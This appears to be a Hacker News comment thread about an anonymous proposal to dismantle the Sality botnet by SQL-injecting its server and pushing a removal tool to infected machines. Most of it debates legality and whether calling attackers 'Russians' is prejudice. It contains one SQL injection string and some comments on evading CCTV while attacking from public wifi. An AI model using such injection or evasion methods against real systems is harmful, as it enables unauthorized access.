The guy takes all the time to put this together, write this up, and is perfectly ok with the outcome, but instead of going to a coffee shop and doing this himself, he spends a lengthy amount of time writing up instructions and giving the criminals a chance to fix their injection problems before someone can take down the botnet.
Baffling.
Not only that, but this guy seems to know what he's doing and instead of someone who knows what they're doing completing the task, he's willing to watch script kids bork the whole thing, or run the risk of russians (or others taking over the whole network and hardening it)
To prove a point- the current system of law is completely broken when it comes to dealing with malicious software. Law enforcement is a joke, to the point where reporting a botnet c&c located right in the US to the FBI will result in a six week run around before you finally get a phone call from someone in the right department, and this is assuming you've dealt with them enough to be on their quick list. Guess who moved their servers four weeks ago?
Actually taking matters into your own hands, as an individual or a company, opens you up to a ridiculous level of liability and is probably illegal in a number of cases. Hell, even analyzing malicious software itself has the potential to be illegal due to draconian copyright laws (fortunately most malware authors aren't willing to claim owner of their software, so this isn't an active issue). Even once all that is done, more malware will be written, and probably by the same people since it's not like taking the botnet down actually puts people behind bars.
This isn't to say the bad guys are winning- I may be a bit bias (I work for Malwarebytes, although this post is my own rambling mess), but a lot of technological strides are being made. There is still a fair bit of frustration out there with law enforcement though, as they continue to impose draconian and orwellian systems but haven't implemented the low hanging fruit in policy changes for actually dealing with this crap.
I apologize in advance for the tone, but as a Russian I have a question - are you racist?
Since Sergey Brin and Mila Yovovich are "russians", do you imply that Google and Hollywood are part of this botnet?
The most famous hacker is Kevin Mitnick [american] and most recent hackers charged/arrested by FBI are also american citizens.
Why don't you change "russians" to "americans"? Or may be "new_zealanders" [Kim dot com]? Or may be "brits" [UK kid, extradicted recently to US on copyright violation charges].
If you would change to "americans", I just wonder whether some people will feel offended and how many?
I agree that it is a prejudice and should be avoided, but it's not completely groundless:
According to industry analyses, Russia accounts for about 35 percent of
global cybercrime revenue, or between $2.5 and $3.7 billion. That’s wildly
out of proportion with the country’s share of the global information
technology market (which is around 1 percent).
"Why does every hacking and cyberscam story – real or fictional – seem to have a Russia connection?
In part, it is prejudice and laziness. The stereotype of the Russian hacker has become such a common media trope that it gets recycled again and again. It also offers a handy update for those looking for new ways to perpetuate the ‘Russian threat.’"
2. Following article line on FSB - anyone knows who hacked PCs of Iran nuke facility? If we judge on who had a reason - US - we shall assume that US have the same or even better hacker team than Russia [very clever OS hack that resulted in hardware malfunction at the nuke plant, thus significantly reducing its output - was covered in 2011].
3. I suspect that most of 'industry analysis' is funded by government agencies, directly or indirectly. So if the conclusion of 'industry analysis' would be that US accounts for 35 or 65 percent of global cybercrime revenue, then the next question would be - what the hell are the various government agencies doing and how effective do they spend government/taxpayers' money?
4. From the same article:
"However, a more basic answer is that a disproportionate number of Russians have worldclass math and computers skills, yet not the kind of jobs to use them legitimately. Although many firms in the industry are based in Russia, or else hire Russians, there is a pool of skilled but under-employed programmers who embrace the hacker world for fun, out of disillusion, or for profit."
Anyone can show me a skilled but under-employed programmer in Russia?
"Skilled but under-emplored programmer in Russia" is like Bigfoot [also known as sasquatch] - everyone heard about him/her, but noone saw. It is a legend...
But of course there are russians, americans, germans, brits, and other nations, which do quite some harm. I just do not think there is a legitimate way to define the winner.
Sorry for off-topic rambling, probably due to habit of enjoying fact-based debate, which resulted from my days in finance ;-))
While my comment was poorly worded, statistically the majority of large botnets like Coreflood, Storm, BredoLab, Rustock, Kelihos are of Russian origin. Even the botnet we are discussing was first seen in Russia.
To comment on a couple of your points
2 - With Stuxnet, I think everyone agrees that US/Israel is to blame. The Russian connection is made because aside from the Iranians, the Russians are the only ones that had access to the facility, and they built the place. A Russian spy is a more likely culprit than a US-Iranian scientist double-agent sabotaging his own facility with results that could kill all of his co-workers.
4- No-one is talking under-employed. These criminals make more money than they ever would at any other job selling access to their botnet, advertising, spamming, installing fake virus software, stealing credit cards, etc. etc.
This gives rise to entities like the Russian Business Network (RBN)
Anyway, I meant no offense, if only americans or brits were clever enough to create a similar profile or stereotype, but I think some script kids guessing passwords pales in comparison to outsmarting the worlds largest software vendors and security researchers.
You are correct on #4. I've heard some stories about hrackers storing piles of cash under the couch [this case was in Ukraine], made from cracking banks/ATMs. Definitely, black activities are much more profitable. But I do not think that [in real life] those that crack get most of the money, with few exceptions. Biggest pile usually goes to those who organize or cover (underworld Board/CEO equivalent).
However, the start-up fever, which started in Russia appr. 1-1.5 years ago, is getting traction, as well as tech industry. This provides more opportunities and better risk/reward ratio and shall result in that more and more people will be moving to bright side.
>"Skilled but under-emplored programmer in Russia" is like Bigfoot [also known as sasquatch] - everyone heard about him/her, but noone saw. It is a legend...
Well, Group-IB (a Russian computer security company) seems to disagree:
In Russia the situation is additionally worsen by a great amount of
technical universities graduates and by unstable home economy
situation as the result of which the mentioned specialists cannot
find highly paid legal income.
I don't know where they get the data from, though.
But of course there are russians, americans, germans, brits, and other nations, which do quite some harm. I just do not think there is a legitimate way to define the winner.
Sure, it's still a prejudice, I was just pointing out it's not completely irrational.
> "Skilled but under-emplored programmer in Russia" is like Bigfoot [also known as sasquatch] - everyone heard about him/her, but noone saw. It is a legend...
Pretty good observation. I think most people are operating on 10-12 year old data when they think that. They think "fall of the Soviet Union" with now hungry scientists slowly turning to the dark side to become less hungry mad scientists who will inflict pain and suffering upon us all.
Perceptions are funny thing [except when from yr boss]...
I recall that in 1997-1998, when I was helping Coca-Cola establish plant in Vladivostok (Far East near Japan, 0.5 mil population), some people were concerned to go there because of tigers and bears wandering in the streets...
Yes, when I was setting up a server I eventually had to apply a separate and more draconian set of firewall rules to IP addresses in Russia and China to avoid my logs just filling up with Junk, failed logins , attempts to access shady looking URLs which did not exist and HTTP requests filled with fragments of shell or SQL script.
To be fair I'm sure this only represents a minority of the people in these countries but perhaps it is just that it is more lucrative there.
I imagine it's quite hard to earn a decent living in the west just by breaking into a few servers and sending out a bit of spam, in Russia it probably looks like an attractive get rich quick for anyone with tech skills.
> in Russia it probably looks like an attractive get rich quick for anyone with tech skills.
It is attractive. But again this is about risk/reward ratio. With increase of risk/complexity and other, legal, opportunities more people shall switch... I think...
Based on that statistic it is significantly more likely that any particular cyber crime (or accurately dollar raised by cyber crime) is nothing to do with Russia than is and yet still this is a justification?
That article doesn't even provide enough information to say that if you had to pick a single country of origin then it's more likely to be Russia than anywhere else.
In terms of generalising based on that sort of thing though, would you similarly justify a suggestion that a drug deal was down to a young black male on the grounds that proportionately young black males in the USA are more likely to be convicted of such offences than young white males? Or would you see that as a sweeping and unhelpful generalisation that tars a whole group based on the activities of a minority?
Apparently you forgot to read the first line of my post. I'm not justifying anything, I'm explaining why the prejudice exists, and that it's not necessarily due to racism.
No. "Racism is the belief that inherent different traits in human racial groups justify discrimination".
If it's based on the current social or economical situation of Russia, it's prejudice, but not racism. Remember that Russians are "citizens of Russia", not a particular ethnic group.
I observe however that their is an emergent definition of 'racism' which is quite a bit more broad than yours.
Basically it is this "Assuming specific or stereotypical attributes about an an individual or group, based on that individual or group's membership in a definable group."
This removes the typical restriction that it involve 'race specific traits' so things like 'Bankers are greedy criminals' or 'Christians are fascists' get reflected back as variations on the 'racist' meme. When ever that group membership nominally includes race it's considered racist by people who share that racial attribute.
Even the discussion we're having (and as an operations guy I see a lot of bad actors whose IPs originate in countries that were former parts of the USSR) we have to be careful to disentangle accusations of people of a region being bad, and regions which host infrastructure which is available to everyone, being used for bad. The Internet does many things and one of those things is create 'telecommuting criminals' who may easily be living in New Hampshire but hosting their C&C servers at a friendly ISP or EC2 equivalent in the Ukraine.
I presume it is inherently and practically more difficult to investigate identity of someone renting servers in US vs Russia, Ukraine or China, in part because of language, legal system and political differences.
Race does refer geographic origin (among other things.) It does not include career or religion. I don't think that is related to what is being discussed at all.
Lots of racism emerges partially as a result of some statistical basis in current social or economic situations that for whatever reason correlate to an ethnic group or nation of origin. (And racism is not solely about ethnic groups, it's also about nations of origin -- ethnic groups are just one of the classifications of humans that are considered "race", geographic ancestry is another.)
It's not racism to recognize these statistical facts. Racism is when we have prejudice based on them. It's when we slander an entire ethnic group or nation of origin based on the actions of a few of them. This is not justified just because there is more cybercrime in Russia than elsewhere: there is cybercrime everywhere, and the vast majority of Russians are not cybercriminals.
It's racism to say we "run the risk of russians" when we mean we run the risk of malevolant cybercriminals. The two terms are not interchangeable. We don't say you "run the risk of blacks" when we mean you might get mugged in downtown LA even if we believe that more muggings in downtown LA come from blacks than other ethnic groups, nor do we say you "run the risk of whites" when we mean you might get killed by a serial killer as you're walking to your car in an empty garage at night, even if we think perpetrators of such crimes are more likely white than anything else.
I think it depends on what one attributes the statistical fact to; it's only racism if we consider it inherent to the group. If we consider that to be a result of a particular condition that happens to be affect certain group at this point in time, and that any other group would have the same problem if subject to the same condition, I don't see how is that racism.
I think your examples are clear prejudice (and no, I wouldn't say them), but they may or may not be racism.
I suppose I just don't see what would motivate someone to slander an entire group of people based on the actions of a few. If someone is worried about cybercrime, they should say so rather than substituting "Russian" as a synonym for cybercriminal. To me that implies that cybercrime is an inherently Russian activity. Perhaps I am too quick to read racism against Russians into such an inflammatory use of the word "Russian" due to the amount of racial discrimination I have seen against Russian users while working in the game industry, where it is not uncommon to dismiss Russian gamers as probably a pirate or probably a hacker and to refuse them a level of support that would be provided to a person with a different accent or last name.
"the term "racial discrimination" shall mean any distinction, exclusion, restriction, or preference based on race, colour, descent, or national or ethnic origin that has the purpose or effect of nullifying or impairing the recognition, enjoyment or exercise, on an equal footing, of human rights and fundamental freedoms in the political, economic, social, cultural or any other field of public life."
I don't know what the US legal definition is (though I'm guessing it's the similar) but in the UK discrimination based on country of origin would count as racism.
I think you're playing the race card and ignoring the facts. Which is pretty lame.
As a brit, I fully appreciate and understand why some people in the world hate all britons. We've done some bad things as a nation in recent years and people have a right to tar us all with the same brush. I understand why it would be unsafe for me to walk the streets of Kabul or Baghdad. If any brit has a problem with the way other people look at them, it's their job as a citizen in a democracy to affect the change they want to see in people's attitude towards this country and it's people.
Except when it's the French. There's no pleasing those cheese eating surrender monkeys.
> As a brit, I fully appreciate and understand why some people in the world hate all britons. We've done some bad things as a nation in recent years and people have a right to tar us all with the same brush.
Well that's cute, but I disagree. I'm Dutch, we've done some rather bad things in our colonial times, yet it is not okay for Indonesians or South Africans to hate all Dutch. Similarly it is NOT okay for Dutch people to hate all Germans just because they invaded us in 40-45 (WW2), because they took our bikes or because they tend to defeat us in international soccer games.
> If any brit has a problem with the way other people look at them, it's their job as a citizen in a democracy to affect the change they want to see in people's attitude towards this country and it's people.
I'd agree with you on that point if only you weren't highly overestimating the level of influence "any Brit" has on these matters, compared to how much "some Brits" have.
Same for any democracy. Even those mythical ones that work. I'm responsible for my own actions, not for those of some bigshot that claims to represent "me" (one individual in a group of several million of that claim).
If you feel that's not right or self-centred and I should do better, I'll try to take responsibility for my own actions extra hard, but I refuse to take on those of some idiot I hardly have any control over. Best I can do with my little vote is to not vote for Geert Wilders--but as you may or may not have noticed, it didn't help much. So am I to feel responsible for that turdmongler? Fuck no! Yet will I discreetly defecate in the kitchen or bathroom sink of anyone I encounter that appears to subscribe to Wilders' moronic ideas? You can count on it, and that's all the responsibility I will take.
> Except when it's the French. There's no pleasing those cheese eating surrender monkeys.
hur hur hur :-/
I'm all for a bit more humorous light-hearted poking on HN, but I'd rather do without crap like this. Made it real hard to read The Black Swan when Taleb continuously did the same, too.
I work in information security, and I can give you a rough breakdown on botnet sites we've run into over the last year. (rough numbers)
25% have been Chinese (or linked to Chinese hackers, but using distributed hosting of hijacked servers around the world)
5% have been US-based.
10% have been Indian.
10% have been "other", including Canada/Mexico/Latin America, Africa, and Western Europe (like the German(?) Conficker worm)
A full 50% have been linked to the Russian Federation (and other former Soviet countries).
Why is this? Everyone has their theories, but mine is the combination of
1. Russia (and Eastern Europe) is a huge area.
2. Russian mafia really ramped up their cybercrime efforts after 1991 when the Soviet Union was retired.
3. Enforcement of cybercrime laws in Russia is lacking in comparison to Western nations, for various reasons.
Many other countries, including the US, have their own hackers and cybercrime groups. China and Russia are much, much more effective, though, and it's fashionable to hate on "commies" in the Western media.
Another reason (4) is that quite a lot of people [majority] download audio/video content and install cracked software on their Windows! home PCs.
I agree that external environment provided much more fertile ground for criminal activities [incl tech] in former USSR.
The key words are "fashionable" and "Western media". We all can observe the influence of media on people's perceptions of events, countries, nationalities...
You forgot to mention that the level of technical educational in Russia is quite high. Combined with mediocre quality of Russian business managers it produces oversupply of tech specialists. That in turn fuels rapid development of botnet ecosystem.
It was clumsily worded but I think we all know he didn't mean to imply that all of Russia was running botnets; he was alluding to Russian organized crime.
Yeah, I was just not sure if you were using it on the whole comment or making a silly joke. And I think it's a word only, at least in a language I speak naturally. That is not English however.
To me it is clear that he meant Russian hackers (as it would have been if it had say Chinese) and I doubt anybody else is confused over this. Given that, writing hackers was redundant and should be dropped.
From the perspective of racism (which is the context here) it's perfectly valid.
The UN's definition of racial descrimination:
"the term "racial discrimination" shall mean any distinction, exclusion, restriction, or preference based on race, colour, descent, or national or ethnic origin that has the purpose or effect of nullifying or impairing the recognition, enjoyment or exercise, on an equal footing, of human rights and fundamental freedoms in the political, economic, social, cultural or any other field of public life."
I had a colleague who was from the Ukraine, and I once referred to him as Ukrainian, and he stiffly responded, "I am Russian." From that, I assumed that some people consider it an ethnic group independent of the nation.
A lot of people from Eastern Europe are very sensitive about that sort of thing; Russia's domination of the USSR and various brutalities are still fresh in memory, and besides, referring to any Eastern European as a Russian is akin to calling someone from Guatemala as a Mexican. Some people are more sensitive about it than others. (I was born in Russia, and don't particularly care, but I'm aware of other people's sensitivities.)
This happens in other parts of the world, too, of course. I once asked a girl in college if she was from India; she gave me a hateful death stare and coldly declared that she was from Bangladesh.
Which brings up another quirk of humanity, which is we tend to hate the ethnic group that is the most similar to our own. Simply, you hate your neighbor, you don't hate someone on the other side of the world you've never interacted with.
There certainly are many instances of people hating ethnicities very disimilar form them, but that happens after people from different parts of the world migrate close to each other.
Well, sure. Your neighbor is the one who waits an extra week to mow his lawn, which looks bad, and drags down everyone's property values. Your neighbor is the one whose dog pooped in your yard that one time.
I suspect that proximity has a great deal more to do with it than similarity. If your neighbor is actually significantly different than you (ugh, the weird smells from the strange food those people eat!) I would think it makes it even worse.
Russian refers to anything related to Russia, including:
* Russians (russkiye), an ethnic group of the East Slavic peoples, primarily living in Russia and neighboring countries (where they are also known as Ruthenians or by other names)
Only if the act itself were traceable to him. If he's the only one who knows how to do it, and it happens, then "of course" he did it. If everyone knows how to do it, who knows who might have been responsible?
I imagine if you do it from a coffee shop or similar public place, then there is a good chance of being caught on CCTV. Whether the authorities will go after someone to that degree, given what they have potentially done, is another matter.
Exactly. It seems to be a point that a lot of people forget. A lot of people don't fully trust the Internet security tools, such as TOR, for anonymity. So, they try to add a layer of what is essentially physical security by using an Internet connection that doesn't track back to them. However, a lot of times people don't fully consider that at that point you must now not only secure your Internet security but physical security as well. Ie. Not be seen.
I'm not saying it is a bad idea to want to add an extra layer of security/anonymity, but it actually has to be done right. If investigators trace it back to the coffee shop and see on the CCTV that you're the only one sitting there using a laptop for the entire time the attack took place you're screwed.
Interestingly enough, all the ways to actually add that layer of physical security are potentially illegal. (depending on local laws) Obviously, the laws can vary a lot, but in a lot of places the methods a person would use to hide themselves are considered unlawful access.
Take the coffee shop for example, instead of entering the coffee shop you sit outside it. If it doesn't have cameras outside, the businesses around it very well might have one that can see you, and then there are also the people that see you. (witnesses) Okay then, long range antenna, right? Wrong, still illegal in some places. Even though it is an unsecured wifi that is meant for people to connect to it, it is meant for customers. That means that you either have to go in and buy a coffee (which shows on camera that you were in the area) or to have previously asked permission to use it which means that someone in the coffee shop must know who you are to have given you permission. This caveat actually applies to the parking lot situation too and people really have been charged before for accessing a coffee shop's wifi from the parking lot without actually going in so this isn't just a thought exercise.
Generally, if you're doing something online illegal enough to be investigated that fully, illegally accessing some coffee shop's connection is the least of your problems. There are legitimate reasons to want total anonymity though, such as whistle-blowers or individuals living in certain countries. If you're going to try for that level of anonymity it is important to know the local laws and make sure that whatever you're trying to be anonymous about is worth potentially breaking that law if it exists.
I also don't understand how he expects that the botnet won't be taken over or hardened based on the results he published before it gets shut.
I did try to download the images linked in the post, not a single one is as I write replaced with his removal utility, so observing just these few links there's no evidence that somebody already decided to follow his recipe.
I'd really like to read some news writeup in a few days.
I am reminded of the "wine blocks" sold (legally!) during the prohibition, which came with the following warning:
After dissolving the brick in a gallon of water, do not place the liquid in a jug away in the cupboard for twenty days, because then it would turn into wine.
Not unheard of at all. In dry countries today you'll find all the ingredients in one spot of the grocery store to brew your own beer/liquor/wine, but nobody really says it's for brewing they're just conveniently put together
Reading README in the linked zip file, inside is, first, an executable which is a QBFC (http://www.abyssmedia.com/quickbfc) packaged and slightly modified version of AVG's Sality Removal Tool (http://free.avg.com/us-en/remove-sality) to automate the removal of the Sality virus. Then, there is the encrypted version of the same executable, so it will run properly when downloaded by the Sality virus. And finally, there's a simple Python script that queries super peers from a bootstrap list for the most recent URL pack pushed to the Sality P2P network.
I would love to hear a lawyers opinion on whether the OP has any legal case whatsoever if his "not suggestions" are ever used, his identity is identified, and someone decides they want to throw the book at him.
Basically, if some DA decides this is modern day vigalanteism, a step removed - could the OP ever defend himself in court?
IAAL. You know how lawyers always write "I am not your lawyer. This is not legal advice. Consult a lawyer in your jurisdiction."? That's for several good reasons, partly that we like being special, but also because no one could really answer this without doing legal research in the jurisdiction where the OP was charged. The answer will vary not only from country to country but state to state, and could depend on all kinds of specifics we don't know.
With that said, the law is basically a big virtual machine that runs on metaphors and rhetoric, kind of like the IE6 html engine.[1] So if I don't know the answer, I look for a metaphor where I have a better intuition.
In this case, the post reads kind of like: "hey, we all know that bar across the street is a front for organized crime. The law doesn't allow me to ask you to burn it down. So I'm just going to leave this molotov cocktail I assembled on the street here, and tell you not to burn down that bar across the street, OK? Also I've taken careful steps to conceal my identity. Laters."
So my gut is, yeah, in the hypothetical world where the OP screwed up and a million people lost data on their computers, and the FBI went ahead and tracked the OP down and prosecuted, they would be guilty as heck. This is more than just suggesting that it would be nice if someone did illegal things (which could be problematic itself, if the speaker intended and expected the suggestion to be followed), but actually compiling and providing tools and instructions to make it happen.
But if you understand the situation differently, and can offer a better metaphor where they sound innocent, then the answer could change. For example, how about: "hey, that guy is having a manic episode and about to start juggling chainsaws. The law doesn't allow me to suggest you use this tranq gun and shoot him. So I'll just leave it here." Or how about, "these parents are bringing back childhood diseases that have been gone for decades, because charlatans have scared them into avoiding vaccinations. The law doesn't allow me to suggest you vaccinate the kids yourself, so I'll just leave this vaccination candy here ..." OK, that one's definitely illegal, but interesting to contemplate. It's a fun game.
The thing to be careful about, though, is to disconnect what you want to be true from what is actually true. Like in this case, maybe you want it to be true that the law lets you hack someone's computer to protect them, the same way it (maybe) lets you stun the manic guy. But if you know that part's not true, then don't fudge the metaphor to get to the outcome you want.
And I am not your lawyer, and this is not legal advice, and you should consult a lawyer in your jurisdiction.
--
[1] This sounds bad, but I actually think it's a pretty reasonable way to run a legal system. We define a fair system as one that treats like cases alike and different cases different. So the way to make that happen is either to write code in advance that handles every edge case -- which if you've met human beings is hilariously impossible -- or to analogize every new situation to the ones before, and try to fit it in where it belongs. It's a fun problem.
I think the OP might be in difficulties in that event (totally not a layer, just guessing).
But perhaps the OP felt it was less risky this way not just for legal reasons, but because it's easier to send one email anonymously than to carry out the whole operation without being traced.
Not a lawyer. But this would never come to pass - no DA would have the brains let alone the skill or political will to prosecute. Also, seems like a freedom of speech issue. Otherwise it would be difficult for educators to discuss computer security. In fact, I'm pretty sure he could even do away with all of the "non-suggestion" text and still be fine.
If I say, "I think you should hack website X, humanity will be better off for it" that's just my opinion. I can even say, "I think you should empty all of Goldman Sach's bank accounts and use the proceeds to buy up endangered rain forest land in Brazil." As long as I'm not materially facilitating the commission of the crime, I'm just another guy on the internet with an opinion.
Edit: After reviewing http://en.wikipedia.org/wiki/Freedom_of_speech_by_country#ci... I'm coming to the conclusion that the above is pretty far from accurate in any country. Apparently freedom of speech has been under serious assault for decades. Which is sort of sickening, but also a fact of life.
The U.S. criminal code is not like the Canadian Criminal Code. Also, I suggest you reread the statute. By the plain language of the CCC, it is not enough to recommend that someone commit a crime, you must actually counsel them in how to do it (i.e,. provide advice).
There is a huge difference between "I think you should hack this website." and "I think you should use this method I'm providing to hack this website."
I agree that a DA would be highly unlikely to prosecute as it would take a large amount of effort for little gain, but this clearly fits the definition of conspiracy. There is no requirement that conspirators know each other, and posting the files required seems like an overt step.
In the U.S., by definition the conspirators must agree to commit a crime. Thus, they must know each other--not in a personal sense, but they must actually know that there are other participants and agree to act in concert with those other participants.
He's generally right, in the U.S. at least. Suggesting that someone commit an illegal act does not rise to the level of conspiracy. You have to actually do something meaningful to support the criminal effort to be charged with conspiracy.
In certain circumstances, incitement can be a crime, but the threshold for that crime is very high.
He did provide the tools and instructions, to be fair. I'm not sure if that counts as 'something meaningful', but it's something more than just suggesting, anyway.
He's provided some tools and instructions but he seems to have been fairly careful not to provide everything you'd need - there would still need to be a not inconsiderable application of skill and effort from someone.
Essentially he's not loading the gun, putting it in someone's hand and pointing it just waiting for them to squeeze the trigger. My reading is it's closer to him saying where you might find someone you want to shoot and pointing out the gun store.
They simply can't. This is very different from closing down some "piracy" sites. In this case they need to mess with data on your computer. Do you want FBI to have a legal way to read, modify or destroy data on your computer? Even if you want (which I don't believe), there is no way that would work on international scale.
I remember a case from some years back when some group (some AV group or something like that) took control over a major botnet by taking control over domains botnet would use in future for receiving updates/commands. The algorithm was pretty sophisticated as it generated dozens of new domains each day and was trying to contact them on random. E.g. generate 100 domains, try to contact 15 of them, if none responds wait a day. Statistically the bot would get its commands in a 2-3 days (I don't really remember exact numbers so this example might not add up). Well, in order to stop the botnet you'd need to register all available domains out of those 100. So, they were doing just that for some time. They practically blocked the owners operating on the botnet. But they couldn't destroy it. Because that would require manipulating with data on random peoples' computers without their consent which you simply can't (legally). And I think it should stay that way. So anyway, they left it be and owners took control back.
But what can be done? You have to run your operating system updated. Having AV software (which is quicker in updates and act as a prevention) doesn't hurt either. And as this is not a real option for a some time, this is a good way. You destroy it in illegal fashion. But no official organization can do that.
because the actions required to do so are illegal. This isn't about replacing sites or controlling the C&C machines. That's relatively easy.
To 'take down' the bots in the fashion of the OP means you upload the AVG removal tool so that the bots grab it at some point in their update cycle and run it.
What you've done here is arrange to run code on the infected machines that the owner of the machine is unaware of. Code that is intended to alter software on that machine, and that is illegal in exactly the same way as infecting the machine with the bot virus in the first place.
As the machine's are in the main unidentified and spread all over the world, no one legal entity FBI, SOCA, Interpol etc covers them all within their jurisdiction, or can target only the machines with in it, so applicable warrants and permissions would be practically impossible to obtain.
Because it is against the law. Taking down a site used by a criminal (or someone they believe is criminal) is within their purview. Making unauthorized changes to the computers of an innocent 3rd party (even minor changes, like removing a botnet infection) is against the law.
Messing with other people's computers in any form without their information and consent is usually prohibited by law.
A slightly broken analogy would be breaking into a house to remove a hornets nest. Even if you do it carefully and not do any damage and what you do is beneficial for the community as a whole, it's contrary to the law.
If my neighbours hornets nest had killer hornets that were biting all the children in the neighbourhood and the police / council refused to do anything; then it'd be a damned shame if someone neatly removed the hornets nest.
Of course that wouldn't make it any more legal; but your defence would have a field day with the prosecution I'd imagine.
IANAL but I've watched the first double episode of The Firm, and I reckon I've got a pretty good grasp on how the law works now!
I'm curious now. What if my neighbours house was on fire? That fire threatens the whole neighbourhood. Surely I can protect my property by attempting to put out the fire. Do firefighters have indeminty for attempting to put out fires? What about volunteer firefighters?
Obviously I consider a house on fire to be analagous to an infected computer, but I do have some protection putting out a fire right? Nobody would sue me for fire damage (as long as I'm reasonable etc).
With a house on fire you're taking reasonable action to protect life.
In general, when you do something you then take responsibility for the consequences of that action. Thus, if there was a tiny fire and you flooded the house with water and foam and caused considerable water damage you may find the home owner suing for damage caused. You could counter by saying you prevented much more damage, but they'd say that a competent fire-fighter would have done that and avoided all the water damage.
The analogy fails (as they always do) because there are specific criminal laws around computer misuse / unauthorised use. Running software on someone's machine without their permission is unlawful.
You may have mitigation if you can claim that the harm from the botnet was more severe than the harm caused by the clean-up-hacking.
It is frustrating. I used to say "Don't fight abuse with abuse", but it's pretty hard to keep that attitude in the face of so much malware and spam.
"A slightly broken analogy would be breaking into a house to remove a hornets nest. Even if you do it carefully and not do any damage and what you do is beneficial for the community as a whole, it's contrary to the law."
On the other hand, you can't give a choking person the heimlich maneuver, or perform CPR on someone, without physical contact that could be construed as assault (or battery? not sure) in any other context.
But what if I genuinely wanted to see if I had registered a user by the name of "' or 1=1 --"? Oh well, hopefully someone else did it too, since it was posted here.
The "takedown" technique presented works by exploiting the botnet's functionality to have all the machines remove themselves from the botnet - actually carrying out the removal requires you to hack into at least one third-party server, and it would probably count as gaining unauthorized access to each of the machines in the botnet as well.
It's illegal in a similar manner to robbing a drug cartel--getting arrested is probably the least of your concerns. No one will step forward to law enforcement over it, but organized crime has their own law enforcement.
Sounds like the author figured out a SQL injection vulnerability in the website the bot downloads logos from, and a way to give the removal tool as the image in a way that infects Sality itself. This would distribute the removal tool very quickly. The hacking of the website seems to be the legal issue here.
While yes this is technically illegal, honest question does the letter of the law stand in a situation where those "wronged" by the infraction are themselves in the wrong? From a legal standpoint, charges would have to be brought against you by someone, and I doubt that anyone who sustained damage from this situation (the bot network's owner) would have the ability to demonstrate such a thing without substantially incriminating themselves.
From a purely philosophical standpoint, you could take a utilitarian approach ala J.S. Mill and say that it would do the greatest quality of good to the greatest number of people to take such action. Granted at the point we're discussing philosophy, we're outside the judicial process which is all that's up for debate here.
Presumably because it involves exploiting a SQL injection attack on one or more control servers, and then using the control servers to install software on thousands of other people's computers without their knowledge or consent.
Because technically the methods used (i.e. SQL injection) are illegal if you dont own the equipment your using it on.
Also he is a civilian and does not have any power or jurisdiction to do so.
Slightly off-topic: Is SQL injection itself illegal? Because I was under the impression that only using SQL injection to gain unauthorized access to someone else's computer (like the OP is suggesting) was illegal.
Is it just me or did the OP just blow a rare opportunity to be a hero? The power of a zero-day exploit is that you don't announce it and give the target a chance to make a patch.
Looks like the OP is doing a hack - he is trying to achieve his goal [of destroying parts of the botnet] by hacking legal system, since he can not do this on his own...
Does anyone know if the actions described in the article have been carried out? I'd hate to think that the "current owners" of the Sality botnet have fixed this exploit.
What if I get permission from the owner of one of the infected systems to "penetrate" his setup and upload the botnet-destroyer. Would that still be illegal?
I think the issue is that to remove the botnet, it requires having your code be executed on all infected machines. You can't possible get permission from the owners of the millions of infected machines to do this.
Yep. Imagine if it bugged out and broke all the infected machines. Even if the bug that broke the machines wasn't his fault, he'd probably still be in a grey area.
Even a bug that affects just 0.1% of a 1 million big bot net would still leave a 1000 unhappy users with broken setups that might consider themselves to have been better off with the bot net.
I'm kind of confused why one would publish the HOWTO-kill anonymously. It would be totally reasonable to publish the howto and "wouldn't it be horrible if this happened; don't do it" under your name (if you want fame, without legal liability). Or, just publish and do it all anonymously. I guess I'm motivated by either fame or kills, which might be different than the anonymous party here.
I guess even publishing legally-protected information doesn't protect you from the nuisance of civil lawsuits, or potential extralegal/illegal actions by either the botnet staff or anyone who is harmed by the botnet or removal of botnet.
Baffling.
Not only that, but this guy seems to know what he's doing and instead of someone who knows what they're doing completing the task, he's willing to watch script kids bork the whole thing, or run the risk of russians (or others taking over the whole network and hardening it)